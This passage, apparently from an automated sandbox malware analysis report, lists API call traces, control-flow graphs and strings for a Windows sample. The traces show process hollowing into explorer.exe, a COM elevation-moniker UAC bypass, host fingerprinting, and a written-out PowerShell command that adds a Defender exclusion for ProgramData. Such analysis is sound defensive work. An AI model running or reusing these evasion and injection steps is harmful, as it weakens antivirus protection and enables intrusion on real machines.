                        • Part of subcall function 005E72E0: ExpandEnvironmentStringsW.KERNEL32(%ProgramW6432%,?,00000104,?,?,?,005E92E8), ref: 005E7319
                        • Part of subcall function 005E72E0: lstrlenW.KERNEL32(?,?,?,?,005E92E8), ref: 005E7322
                        • Part of subcall function 005E72E0: ExpandEnvironmentStringsW.KERNEL32(%ProgramFiles%,?,00000104,?,?,?,005E92E8), ref: 005E733D
                        • Part of subcall function 005E72E0: GetSystemWow64DirectoryW.KERNEL32(?,00000104,?,?,?,005E92E8), ref: 005E734B
                        • Part of subcall function 005E72E0: GetLastError.KERNEL32(?,?,?,005E92E8), ref: 005E7355
                        • Part of subcall function 005E72E0: wnsprintfW.SHLWAPI ref: 005E7377
                        • Part of subcall function 005E72E0: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 005E738F
                        • Part of subcall function 005E72E0: wnsprintfW.SHLWAPI ref: 005E73A9
                        • Part of subcall function 005E72E0: SetFileAttributesW.KERNEL32(?,00000006), ref: 005E73C5
                        • Part of subcall function 005E72E0: lstrcpyW.KERNEL32(?,/c "powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'"), ref: 005E73D7
                        • Part of subcall function 005E72E0: GetUserNameW.ADVAPI32(?,?), ref: 005E73F6
                        • Part of subcall function 005E72E0: NetUserGetInfo.NETAPI32(00000000,?,00000001,00000000), ref: 005E740B
                        • Part of subcall function 005E72E0: NetApiBufferFree.NETAPI32(00000000), ref: 005E7420
                        • Part of subcall function 005E72E0: CoInitializeEx.OLE32(00000000,?), ref: 005E7437
                        • Part of subcall function 005E72E0: lstrlenW.KERNEL32({3E5FC7F9-9A51-4367-9063-A120244FBEC7}), ref: 005E7451
                        • Part of subcall function 005E93B0: CryptGenRandom.ADVAPI32(00000020,?), ref: 005E93C8
                        • Part of subcall function 005E93B0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 005E9425
                        • Part of subcall function 005E93B0: HeapFree.KERNEL32(00000000), ref: 005E942C
                        • Part of subcall function 005E93B0: wsprintfA.USER32 ref: 005E945F
                        • Part of subcall function 005E93B0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 005E9498
                        • Part of subcall function 005E93B0: HeapFree.KERNEL32(00000000), ref: 005E949B
                        • Part of subcall function 005E93B0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 005E94A0
                        • Part of subcall function 005E93B0: HeapFree.KERNEL32(00000000), ref: 005E94A3
                        • Part of subcall function 005E7920: LsaOpenPolicy.ADVAPI32(00000000,005EA060,00000001,?), ref: 005E795C
                        • Part of subcall function 005E7920: LsaQueryInformationPolicy.ADVAPI32(?,0000000C,?), ref: 005E7975
                        • Part of subcall function 005E7920: GetProcessHeap.KERNEL32(00000008,?), ref: 005E7991
                        • Part of subcall function 005E7920: HeapAlloc.KERNEL32(00000000), ref: 005E7994
                        • Part of subcall function 005E7920: LsaFreeMemory.ADVAPI32(?), ref: 005E79DB
                        • Part of subcall function 005E7920: LsaClose.ADVAPI32(?), ref: 005E79E4
                        • Part of subcall function 005E7920: GetComputerNameW.KERNEL32(?,?), ref: 005E7A00
                        • Part of subcall function 005E7920: GetUserNameW.ADVAPI32(?,00000101), ref: 005E7A11
                        • Part of subcall function 005E7920: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 005E7A32
                        • Part of subcall function 005E8900: ExpandEnvironmentStringsW.KERNEL32(%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe,?,00000104), ref: 005E8921
                        • Part of subcall function 005E8900: ExpandEnvironmentStringsW.KERNEL32(%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe,?,00000104), ref: 005E8934
                        • Part of subcall function 005E8900: ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000104), ref: 005E8947
                        • Part of subcall function 005E8900: GetFileAttributesW.KERNEL32(?), ref: 005E896D
                        • Part of subcall function 005E8900: lstrcpyW.KERNEL32(00000000,sd4.ps1), ref: 005E899D
                        • Part of subcall function 005E8900: wnsprintfW.SHLWAPI ref: 005E89C0
                        • Part of subcall function 005E8900: ShellExecuteW.SHELL32(00000000,open,?,?,00000000,00000000), ref: 005E89E2
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true
                      • Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd
                      Yara matches
                      Similarity
                      • API ID: EnvironmentExpandStrings$Heap$FreeProcess$AttributesFileUser$CryptNamewnsprintf$AcquireAddressContextDevicesDisplayEnumErrorInformationInitializeLastPolicyProclstrcpylstrlenwsprintf$AllocBufferByteCharCloseComputerCreateCriticalDefaultDirectoryExecuteExitFromHandleInfoLangMemoryModuleMultiMutexOpenQueryRandomSectionShellStartupStringSystemVolumeWideWow64
                      • String ID:
                      • API String ID: 1026145915-0
                      • Opcode ID: cb62bac3a13225769f495d9572632340b0265a138fc7d5ab6a001d9063cea412
                      • Instruction ID: 83b0dbd757b5ed14c466f706a1779a7dbdfa34d4e17aec9e29eff825b5cc6aab
                      • Opcode Fuzzy Hash: cb62bac3a13225769f495d9572632340b0265a138fc7d5ab6a001d9063cea412
                      • Instruction Fuzzy Hash: 2B01BB5C6011E222EE3CF59F50A52B43942FFC0321FC8812A6BD66BDE58D081E83425F

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 203 f01710-f0175a call f01110 * 2 208 f01760-f01764 203->208 209 f0183f-f01858 call f075a0 call f04704 203->209 208->209 210 f0176a-f0176e 208->210 210->209 213 f01774-f01778 210->213 213->209 215 f0177e-f0179c call f07928 213->215 219 f017a7-f017ad 215->219 220 f017c2-f0182b call f016c0 call f01300 GetPEB GetUserDefaultLCID call f075a0 219->220 221 f017af-f017c0 219->221 228 f01830-f0183c call f075a0 220->228 221->219 228->209
                      APIs
                        • Part of subcall function 00F01110: GetModuleHandleA.KERNEL32(kernel32), ref: 00F0111B
                        • Part of subcall function 00F01110: GetModuleHandleW.KERNEL32(00000000), ref: 00F01162
                      • GetUserDefaultLCID.KERNELBASE ref: 00F01824
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                      • Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd
                      Similarity
                      • API ID: HandleModule$DefaultUser
                      • String ID:
                      • API String ID: 3008646163-0
                      • Opcode ID: afcf5c4bf59e257c8febcb4b70a17df61dde1a14f9ba1bb9774f2f9a67310349
                      • Instruction ID: 4e078d1f90623586b7a9b0cbe5a3c49f85e669fe84893f053b93a33df8858ed9
                      • Opcode Fuzzy Hash: afcf5c4bf59e257c8febcb4b70a17df61dde1a14f9ba1bb9774f2f9a67310349
                      • Instruction Fuzzy Hash: 3841F7B5D002099FDF04DF98C881AEEB7F5BF48304F148559E515A7381E735AA41EFA1

                      Control-flow Graph

                      APIs
                        • Part of subcall function 00F03670: task.LIBCPMTD ref: 00F03748
                      • LPtoDP.GDI32(00000000,0056AA94,0538CD39), ref: 00F03C61
                      • GetLastError.KERNEL32 ref: 00F03C6B
                      • ExitProcess.KERNEL32 ref: 00F03C78
                      • BuildCommDCBAndTimeoutsA.KERNEL32(eruigoreh ertoerh634643,00000000,00000000), ref: 00F03C87
                      • GetCurrentProcess.KERNEL32(00000000), ref: 00F03C93
                      • TerminateProcess.KERNEL32(00000000), ref: 00F03C9A
                      Strings
                      • eruigoreh ertoerh634643, xrefs: 00F03C82
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                      • Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd
                      Similarity
                      • API ID: Process$BuildCommCurrentErrorExitLastTerminateTimeoutstask
                      • String ID: eruigoreh ertoerh634643
                      • API String ID: 3960728841-1078997068
                      • Opcode ID: c829ae695342a9e773f273070308254b380cb90554b7ce41450870d23ff90716
                      • Instruction ID: 4cb01b7b162cac7176392f0559c1495b8a27ef6ca14fd1a036d208d598857455
                      • Opcode Fuzzy Hash: c829ae695342a9e773f273070308254b380cb90554b7ce41450870d23ff90716
                      • Instruction Fuzzy Hash: 32016D70A4020CABDB10EFF19D0AB9D7BF8AB08745F11C055E502E61D0DB74EA04FB21

                      Control-flow Graph

                      APIs
                      • GetModuleHandleW.KERNEL32(ntdll), ref: 005E5FED
                      • GetProcAddress.KERNEL32(00000000,NtCreateSection), ref: 005E6001
                      • GetProcAddress.KERNEL32(00000000,NtCreateProcessEx), ref: 005E600C
                      • GetProcAddress.KERNEL32(00000000,RtlCreateProcessParametersEx), ref: 005E6017
                      • GetProcAddress.KERNEL32(00000000,RtlDestroyProcessParameters), ref: 005E6022
                      • GetProcAddress.KERNEL32(00000000,NtCreateThreadEx), ref: 005E602D
                      • GetTempPathW.KERNEL32(000000F6,?), ref: 005E6046
                        • Part of subcall function 005E26A0: GetTickCount.KERNEL32 ref: 005E26A2
                      • wnsprintfW.SHLWAPI ref: 005E6081
                      • PathCombineW.SHLWAPI(?,?,?), ref: 005E609B
                      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000002,00000080,00000000), ref: 005E60C2
                      • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 005E60E6
                      • SetEndOfFile.KERNEL32(00000000), ref: 005E60E9
                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 005E60F6
                      • wnsprintfW.SHLWAPI ref: 005E6114
                      • RtlInitUnicodeString.NTDLL(?,?), ref: 005E612A
                      • RtlInitUnicodeString.NTDLL(?,?), ref: 005E6137
                      • GetCurrentProcess.KERNEL32(00000004,00000000,00000000,00000000,00000000), ref: 005E6176
                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 005E61C5
                      • WriteFile.KERNEL32(00000000,00000000,00000400,00000000,00000000), ref: 005E620F
                      • FlushFileBuffers.KERNEL32(00000000), ref: 005E6217
                      • SetEndOfFile.KERNEL32(00000000), ref: 005E621E
                      • NtQueryInformationProcess.NTDLL ref: 005E6233
                      • ReadProcessMemory.KERNEL32(00000000,?,?,00000480,00000000), ref: 005E625B
                      • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000004), ref: 005E62B2
                      • WriteProcessMemory.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 005E62EE
                      • WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000), ref: 005E62FC
                      • NtClose.NTDLL ref: 005E6335
                      • NtClose.NTDLL ref: 005E6346
                      • NtClose.NTDLL ref: 005E6350
                      • CloseHandle.KERNEL32(00000000), ref: 005E6353
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true
                      • Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd
                      Yara matches
                      Similarity
                      • API ID: File$AddressProcProcess$CloseWrite$Memory$HandleInitPathPointerStringUnicodewnsprintf$AllocBuffersCombineCountCreateCurrentFlushInformationModuleQueryReadTempTickVirtual
                      • String ID: "%s"$%08x%s$.exe$NtCreateProcessEx$NtCreateSection$NtCreateThreadEx$RtlCreateProcessParametersEx$RtlDestroyProcessParameters$ntdll
                      • API String ID: 3548791621-756185880
                      • Opcode ID: 8f9e1f58d486a5ccdb63c77c566fc9e5a840895016d637a49bb47eefd01771fb
                      • Instruction ID: 0e9b18345229201a41b300cce978d8d2d4bc16cfc1e01acf598afeb34071bf61
                      • Opcode Fuzzy Hash: 8f9e1f58d486a5ccdb63c77c566fc9e5a840895016d637a49bb47eefd01771fb
                      • Instruction Fuzzy Hash: 78B17C71A40259ABEB24CBA5CC89FAFBBBCBF18740F104455F654FB190D770AA04CB54

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 559 5e7920-5e796a GetPEB LsaOpenPolicy 560 5e796c-5e797d LsaQueryInformationPolicy 559->560 561 5e79ea-5e7a39 GetComputerNameW GetUserNameW WideCharToMultiByte 559->561 564 5e797f-5e7985 560->564 565 5e79e1-5e79e4 LsaClose 560->565 562 5e7a3b-5e7a42 561->562 563 5e7a44-5e7a58 GetProcessHeap HeapAlloc 561->563 566 5e7a7f-5e7a9e WideCharToMultiByte 562->566 567 5e7a5a-5e7a77 WideCharToMultiByte 563->567 568 5e7a79 563->568 569 5e79da-5e79db LsaFreeMemory 564->569 570 5e7987-5e799e GetProcessHeap HeapAlloc 564->570 565->561 571 5e7aa9-5e7abb GetProcessHeap HeapAlloc 566->571 572 5e7aa0-5e7aa7 566->572 567->566 568->566 569->565 573 5e79d7 570->573 574 5e79a0-5e79ae 570->574 575 5e7ad7-5e7af5 571->575 576 5e7abd-5e7ad5 WideCharToMultiByte 571->576 572->575 573->569 577 5e79b0-5e79b7 574->577 578 5e79d1-5e79d3 574->578 579 5e7b0b-5e7b0d 575->579 580 5e7af7 575->580 576->575 581 5e79cb 577->581 582 5e79b9 577->582 578->573 585 5e7b10-5e7b28 call 5e26a0 579->585 584 5e7b00-5e7b09 580->584 581->578 583 5e79c0-5e79c9 582->583 583->581 583->583 584->579 584->584 588 5e7b2a-5e7b8c call 5e7710 wsprintfA * 2 585->588 591 5e7b8e 588->591 592 5e7ba1-5e7bd5 call 5e6830 588->592 593 5e7b90-5e7b9f 591->593 596 5e7bdf-5e7be4 592->596 597 5e7bd7-5e7bdd GetProcessHeap HeapFree 592->597 593->592 593->593 598 5e7bee-5e7bf3 596->598 599 5e7be6-5e7bec GetProcessHeap HeapFree 596->599 597->596 600 5e7bfd-5e7bff 598->600 601 5e7bf5-5e7bfb GetProcessHeap HeapFree 598->601 599->598 602 5e7c09-5e7c0f 600->602 603 5e7c01-5e7c07 GetProcessHeap HeapFree 600->603 601->600 603->602
                      APIs
                      • LsaOpenPolicy.ADVAPI32(00000000,005EA060,00000001,?), ref: 005E795C
                      • LsaQueryInformationPolicy.ADVAPI32(?,0000000C,?), ref: 005E7975
                      • GetProcessHeap.KERNEL32(00000008,?), ref: 005E7991
                      • HeapAlloc.KERNEL32(00000000), ref: 005E7994
                      • LsaFreeMemory.ADVAPI32(?), ref: 005E79DB
                      • LsaClose.ADVAPI32(?), ref: 005E79E4
                      • GetComputerNameW.KERNEL32(?,?), ref: 005E7A00
                      • GetUserNameW.ADVAPI32(?,00000101), ref: 005E7A11
                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 005E7A32
                      • GetProcessHeap.KERNEL32(00000008,00000001), ref: 005E7A48
                      • HeapAlloc.KERNEL32(00000000), ref: 005E7A4B
                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 005E7A75
                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 005E7A97
                      • GetProcessHeap.KERNEL32(00000008,00000001), ref: 005E7AAD
                      • HeapAlloc.KERNEL32(00000000), ref: 005E7AB0
                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 005E7AD5
                      • wsprintfA.USER32 ref: 005E7B56
                      • wsprintfA.USER32 ref: 005E7B81
                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005E7BDA
                      • HeapFree.KERNEL32(00000000), ref: 005E7BDD
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 005E7BE9
                      • HeapFree.KERNEL32(00000000), ref: 005E7BEC
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 005E7BF8
                      • HeapFree.KERNEL32(00000000), ref: 005E7BFB
                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005E7C04
                      • HeapFree.KERNEL32(00000000), ref: 005E7C07
                      Strings
                      • %s|%d.%d (%d)|%s|%s|%S, xrefs: 005E7B7B
                      • %d|%s|%.16s|, xrefs: 005E7B50
                      • 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 005E7AE2
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true
                      • Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$Process$Free$ByteCharMultiWide$Alloc$NamePolicywsprintf$CloseComputerInformationMemoryOpenQueryUser
                      • String ID: %d|%s|%.16s|$%s|%d.%d (%d)|%s|%s|%S$0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
                      • API String ID: 4008773985-1210213088
                      • Opcode ID: acbc2ec0987fe9cd1dfe757780649167dcbb9ff69de8133b6b2196ca3cd03740
                      • Instruction ID: 03fd9989bdec0e6e2e07c20fd842fdeb0560812df5ad6b4f98d9f90da2210318
                      • Opcode Fuzzy Hash: acbc2ec0987fe9cd1dfe757780649167dcbb9ff69de8133b6b2196ca3cd03740
                      • Instruction Fuzzy Hash: 6D91C371A0434DAEEB189BA6CC45FAF7BBDFF48700F140165E694EB191DB70A905CB60

                      Control-flow Graph

                      APIs
                      • GetModuleHandleW.KERNEL32(ntdll.dll,NtQueryInformationProcess,74DF0EE0,?), ref: 005E94CC
                      • GetProcAddress.KERNEL32(00000000), ref: 005E94D5
                      • GetModuleHandleW.KERNEL32(ntdll.dll,RtlEnterCriticalSection), ref: 005E94E4
                      • GetProcAddress.KERNEL32(00000000), ref: 005E94E7
                      • GetModuleHandleW.KERNEL32(ntdll.dll,RtlLeaveCriticalSection), ref: 005E94F6
                      • GetProcAddress.KERNEL32(00000000), ref: 005E94F9
                      • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString), ref: 005E9508
                      • GetProcAddress.KERNEL32(00000000), ref: 005E950B
                      • GetCurrentProcessId.KERNEL32 ref: 005E9539
                      • OpenProcess.KERNEL32(00000438,00000000,00000000), ref: 005E9547
                      • ReadProcessMemory.KERNEL32(00000000,?,4t^,00000004,00000000), ref: 005E9578
                      • ReadProcessMemory.KERNEL32(00000000,4t^,?,00000004,00000000), ref: 005E9592
                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 005E95A8
                      • StrNCatW.SHLWAPI(?,\explorer.exe,00000105), ref: 005E95BF
                      • VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004), ref: 005E95D3
                      • lstrcpyW.KERNEL32(00000000,?), ref: 005E95E4
                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 005E9621
                      • ReadProcessMemory.KERNEL32(00000000,?,?,00000004,00000000), ref: 005E964D
                      • ReadProcessMemory.KERNEL32(00000000,?,?,?,00000000), ref: 005E966C
                      • CloseHandle.KERNEL32(00000000), ref: 005E96AF
                      • StrCmpIW.SHLWAPI(?,?), ref: 005E96C3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true
                      • Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd
                      Yara matches
                      Similarity
                      • API ID: Process$HandleModule$AddressMemoryProcRead$AllocCloseCurrentDirectoryFileNameOpenVirtualWindowslstrcpy
                      • String ID: 4t^$NtQueryInformationProcess$RtlEnterCriticalSection$RtlInitUnicodeString$RtlLeaveCriticalSection$\explorer.exe$explorer.exe$ntdll.dll
                      • API String ID: 2609293587-3575179387
                      • Opcode ID: a68ae02401f85688989803f09346b5f0123b0afda9c9d465599119c5b007514a
                      • Instruction ID: 4bbb79e08559384a72729f4d742cd77a3bd80c6b538ee3e2a79e634b3dff059d
                      • Opcode Fuzzy Hash: a68ae02401f85688989803f09346b5f0123b0afda9c9d465599119c5b007514a
                      • Instruction Fuzzy Hash: 0B616EB2A40259ABDB14EBA5CC89FAEBBBCFF44711F100152F654E7190D770EA45CB60

                      Control-flow Graph

                      APIs
                      • ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000104,?,?,?,005E92E8), ref: 005E7306
                      • ExpandEnvironmentStringsW.KERNEL32(%ProgramW6432%,?,00000104,?,?,?,005E92E8), ref: 005E7319
                      • lstrlenW.KERNEL32(?,?,?,?,005E92E8), ref: 005E7322
                      • ExpandEnvironmentStringsW.KERNEL32(%ProgramFiles%,?,00000104,?,?,?,005E92E8), ref: 005E733D
                      • GetSystemWow64DirectoryW.KERNEL32(?,00000104,?,?,?,005E92E8), ref: 005E734B
                      • GetLastError.KERNEL32(?,?,?,005E92E8), ref: 005E7355
                      • wnsprintfW.SHLWAPI ref: 005E7377
                      • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 005E738F
                      • wnsprintfW.SHLWAPI ref: 005E73A9
                      • SetFileAttributesW.KERNEL32(?,00000006), ref: 005E73C5
                      • lstrcpyW.KERNEL32(?,/c "powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'"), ref: 005E73D7
                      • GetUserNameW.ADVAPI32(?,?), ref: 005E73F6
                      • NetUserGetInfo.NETAPI32(00000000,?,00000001,00000000), ref: 005E740B
                      • NetApiBufferFree.NETAPI32(00000000), ref: 005E7420
                      • CoInitializeEx.OLE32(00000000,?), ref: 005E7437
                      • lstrlenW.KERNEL32({3E5FC7F9-9A51-4367-9063-A120244FBEC7}), ref: 005E7451
                      • wsprintfW.USER32 ref: 005E748E
                      • CoGetObject.OLE32(?,005E2508,005E2508,00000000), ref: 005E74AB
                      • CoUninitialize.OLE32 ref: 005E74EB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true
                      • Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd
                      Yara matches
                      Similarity
                      • API ID: EnvironmentExpandStrings$Userlstrlenwnsprintf$AttributesBufferDirectoryErrorFileFreeInfoInitializeLastNameObjectSystemUninitializeWow64lstrcpywsprintf
                      • String ID: "%s"$$$%%ProgramData%%\r%Sr.js$%ComSpec%$%ProgramFiles%$%ProgramW6432%$/c "powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'"$Elevation:Administrator!new:%s${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                      • API String ID: 3941589607-3081872691
                      • Opcode ID: 6e421c017e1034fdc2ba9ed3716ffcf1a359b9fd641dc6e7dcbfb6117c5432d5
                      • Instruction ID: e88f6b1b0379ce06505c8e29f20d75d2c91f287d56f18ff8e0d86032de6f15fa
                      • Opcode Fuzzy Hash: 6e421c017e1034fdc2ba9ed3716ffcf1a359b9fd641dc6e7dcbfb6117c5432d5
                      • Instruction Fuzzy Hash: 4C5141B190029CABEB24DB95DC89FDE7BBCFB48701F000095E689E7190D7709A88CF61

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 742 5e5c60-5e5c73 743 5e5fae-5e5fb6 742->743 744 5e5c79-5e5c9a GetModuleHandleW GetProcAddress 742->744 744->743 745 5e5ca0-5e5cb1 744->745 745->743 746 5e5cb7-5e5cbe 745->746 747 5e5cc7-5e5cca 746->747 748 5e5cc0-5e5cc5 746->748 747->743 750 5e5cd0 747->750 749 5e5cd5 748->749 751 5e5cd7-5e5ce0 749->751 750->749 751->751 752 5e5ce2 751->752 753 5e5ce4-5e5cf0 752->753 753->753 754 5e5cf2-5e5cf8 753->754 755 5e5d00-5e5d0e 754->755 755->755 756 5e5d10 755->756 757 5e5d12-5e5d1b 756->757 757->757 758 5e5d1d-5e5d55 CreateProcessW 757->758 759 5e5d5b-5e5d9c NtQueryInformationProcess ReadProcessMemory GetThreadContext 758->759 760 5e5fa5-5e5fad 758->760 761 5e5f95-5e5fa3 CloseHandle * 2 759->761 762 5e5da2-5e5daf 759->762 761->760 762->761 764 5e5db5-5e5e04 VirtualAllocEx WriteProcessMemory 762->764 765 5e5e3c-5e5e40 764->765 766 5e5e06-5e5e17 764->766 769 5e5f56-5e5f8f WriteProcessMemory SetThreadContext ResumeThread 765->769 770 5e5e46-5e5e50 765->770 767 5e5e2d-5e5e38 766->767 768 5e5e19-5e5e2b WriteProcessMemory 766->768 767->766 771 5e5e3a 767->771 768->767 769->761 770->769 772 5e5e56-5e5e59 770->772 771->765 773 5e5e60 772->773 774 5e5e62-5e5e6a 773->774 774->774 775 5e5e6c-5e5e7f 774->775 776 5e5ea0-5e5ead 775->776 777 5e5e81-5e5e86 775->777 779 5e5f3c-5e5f4a 776->779 780 5e5eb3-5e5eb9 776->780 778 5e5e88-5e5e93 777->778 778->779 783 5e5e99-5e5e9b 778->783 779->773 782 5e5f50 779->782 781 5e5ec0-5e5ed5 780->781 784 5e5f37-5e5f3a 781->784 785 5e5ed7-5e5eeb 781->785 782->769 783->778 786 5e5e9d 783->786 784->779 784->781 787 5e5f2f-5e5f35 785->787 788 5e5eed-5e5f2c ReadProcessMemory WriteProcessMemory 785->788 786->776 787->784 787->785 788->787
                      APIs
                      • GetModuleHandleW.KERNEL32(ntdll,NtUnmapViewOfSection), ref: 005E5C83
                      • GetProcAddress.KERNEL32(00000000), ref: 005E5C8A
                      • CreateProcessW.KERNEL32(C:\Windows\system32\explorer.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000000), ref: 005E5D4D
                      • NtQueryInformationProcess.NTDLL ref: 005E5D6A
                      • ReadProcessMemory.KERNEL32(00000000,?,?,00000480,00000000), ref: 005E5D84
                      • GetThreadContext.KERNEL32(?,00010007), ref: 005E5D94
                      • VirtualAllocEx.KERNEL32(00000000,?,?,00003000,00000040), ref: 005E5DC8
                      • WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 005E5DF2
                      • WriteProcessMemory.KERNEL32(00000000,?,?,?,00000000,?,?,00000000), ref: 005E5E2B
                      • ReadProcessMemory.KERNEL32(00000000,?,00000000,00000004,00000000,?,?,00000000), ref: 005E5F0B
                      • WriteProcessMemory.KERNEL32(00000000,?,00000000,00000004,00000000,?,?,00000000), ref: 005E5F23
                      • WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,00000000), ref: 005E5F6B
                      • SetThreadContext.KERNEL32(?,00010007,?,?,00000000), ref: 005E5F86
                      • ResumeThread.KERNEL32(?,?,?,00000000), ref: 005E5F8F
                      • CloseHandle.KERNEL32(?), ref: 005E5F9E
                      • CloseHandle.KERNEL32(00000000), ref: 005E5FA3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true
                      • Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd
                      Yara matches
                      Similarity
                      • API ID: Process$Memory$Write$HandleThread$CloseContextRead$AddressAllocCreateInformationModuleProcQueryResumeVirtual
                      • String ID: .reloc$C:\Windows\system32\certutil.exe$C:\Windows\system32\explorer.exe$NtUnmapViewOfSection$ntdll
                      • API String ID: 918112823-4001407722
                      • Opcode ID: 79ebd2e449dd363d96aeda1d8746ec1eb4e61c02241cd1cbd143227e0dc4ccd8
